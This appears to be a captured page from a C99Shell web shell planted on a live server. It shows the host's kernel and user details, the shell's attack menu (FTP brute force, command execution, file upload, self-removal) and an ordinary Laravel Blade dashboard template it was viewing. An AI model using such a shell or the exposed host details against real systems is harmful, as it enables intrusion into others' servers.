!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/resources/views/customer/   drwxr-xr-x
Free 26.6 GB of 117.98 GB (22.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     dashboard.blade.php (8.09 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.admin')
@section('page-title')
{{__('Dashboard')}}
@endsection
{{--{{dd($invoiceChartData['data'])}}--}}
@push('script-page')
{{-- <script>
    var options = {
            series: [
                {
                    name: "{{__('Unpaid')}}",
                    data: {!! json_encode($invoiceChartData['data']['unpaid']) !!}
                }, {
                    name: "{{__('Paid')}}",
                    data: {!! json_encode($invoiceChartData['data']['paid']) !!}
                }, {
                    name: "{{__('Partial Paid')}}",
                    data: {!! json_encode($invoiceChartData['data']['partial']) !!}
                }, {
                    name: "{{__('Due')}}",
                    data: {!! json_encode($invoiceChartData['data']['due']) !!}
                },

            ],
            chart: {
                height: 350,
                type: 'line',
                dropShadow: {
                    enabled: true,
                    color: '#000',
                    top: 18,
                    left: 7,
                    blur: 10,
                    opacity: 0.2
                },
                toolbar: {
                    show: false
                }
            },
            colors: ['#FF5630', '#36B37E', '#00B8D9', '#FFAB00'],
            dataLabels: {
                enabled: true,
            },
            stroke: {
                curve: 'smooth'
            },
            title: {
                text: '',
                align: 'left'
            },
            grid: {
                borderColor: '#e7e7e7',
                row: {
                    colors: ['#f3f3f3', 'transparent'], // takes an array which will be repeated on columns
                    opacity: 0.5
                },
            },
            markers: {
                size: 1
            },
            xaxis: {
                categories: {!! json_encode($invoiceChartData['month']) !!},
                title: {
                    text: 'Month'
                }
            },
            yaxis: {
                title: {
                    text: '{{__('Amount')}}'
                },

            },
            legend: {
                position: 'top',
                horizontalAlign: 'right',
                floating: true,
                offsetY: -25,
                offsetX: -5
            }
        };
        var chart = new ApexCharts(document.querySelector("#chart-sales"), options);
        chart.render();
</script> --}}
@endpush
@section('content')
<div class="row">
    <div class="col-xl-6 col-md-6">
        <div class="card card-stats">
            <div class="card-body">
                <div class="row">
                    <div class="col">
                        @php
                            $auth = \Auth::user();
                            $userPlan = \App\Models\Plan::getPlan($auth->show_dashboard());
                        @endphp
                        <h6 class="text-muted mb-1">Hello, {{isset($auth->name)?$auth->name:''}}</h6>
                        <br>
                        <h4 class="text-muted mb-1">Welcome To Your Dashboard</h4>
                        <span class="h6 font-weight-bold mb-0 ">Date : {{date("Y-m-d");}}</span> <br>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="col-xl-6 col-md-6">
        <div class="card card-stats">
            <div class="card-body">
                <div class="row">
                    <div class="col">
                        <h6 class="text-muted mb-1">Get Best Services</h6>
                        @if (!empty($userPlan) && $userPlan->taxi_system == 1)
                        <div class="order-r-btn  mt-3">
                            <span class="h3 font-weight-bold mb-0">
                                <a href="{{route('order.request.create.customer')}}"  data-bs-toggle="tooltip" title="{{__('Create')}}" data-title="{{__('Create New Order')}}"  class="btn btn-sm btn-primary">
                                    <i class="ti ti-plus"> Create Order</i>
                                </a>
                                </span>
                        </div>
                        @endif
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<div class="row">
    <div class="col-xl-12 col-md-12">
        <div class="card card-fluid">
            <div class="card-header">
                <h6 class="mb-0">Completed Order List</h6>

            </div>

            <div class="card-body table-border-style">
                <div class="table-responsive">
                    <table class="table datatable">
                        <thead>
                        <tr>
                            <th>{{__('Destination')}}</th>
                            <th>{{__('Total Km')}}</th>
                            <th>{{__('Kilometer Price')}}</th>
                            <th>{{__('Total Cost')}}</th>
                            <th>{{__('Status')}}</th>
                        </tr>
                        </thead>
                        <tbody>
                            @if (isset($texiorders) && $texiorders)
                            @foreach ($texiorders as $taxiOrder)
                        <tr class="font-style">
                            <td>
                                <div class="destination-sec">
                                    <div class="pick-up-address">
                                        <strong>{{__('From')}} :</strong> {{isset($taxiOrder->pickup_address)?$taxiOrder->pickup_address:''}}
                                    </div>
                                    <div class="destination-address">
                                        <strong>{{__('To')}} :</strong> {{isset($taxiOrder->destination_address)?$taxiOrder->destination_address:''}}

                                    </div>
                                </div>
                            </td>
                            <td>{{isset($taxiOrder->total_km)?$taxiOrder->total_km:''}}</td>
                            <td>{{isset($taxiOrder->kilometer_price)?$taxiOrder->kilometer_price:''}}</td>
                            <td>
                                @if (isset($taxiOrder->total_cost) && $taxiOrder->total_cost)
                                {{\Auth::user()->priceFormat(isset($taxiOrder->total_cost)?$taxiOrder->total_cost:'')}}
                            @endif
                            </td>
                            <td>
                                <div class="driver-status-section">
                                       @if (isset($taxiOrder->status) && $taxiOrder->status)
                                           @if($taxiOrder->status=='accepted')
                                           <span class="badge badge-success">{{ucfirst($taxiOrder->status)}}</span>
                                           @else
                                           <span class="badge badge-danger">{{ucfirst($taxiOrder->status)}}</span>
                                           @endif
                                       @endif
                                   </div>
                               </td>

                        </tr>
                        @endforeach
                    @endif

                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>
</div>
<div class="row">
    <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
        <div class="card card-fluid">
            <div class="card-header">
                <h6 class="mb-0">Project Status</h6>
            </div>

        </div>
    </div>
    <div class="col-xs-12 col-sm-12 col-md-6 col-lg-8">
        <div class="card">
            <div class="card-header">
                <div class="d-flex justify-content-between align-items-center">
                    <div>
                        <h6 class="mb-0">Top Due Projects</h6>
                    </div>
                </div>
            </div>
            <div class="scrollbar-inner">
                <div class="min-h-430 mh-430">

                </div>
            </div>
        </div>
    </div>
</div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0081 ]--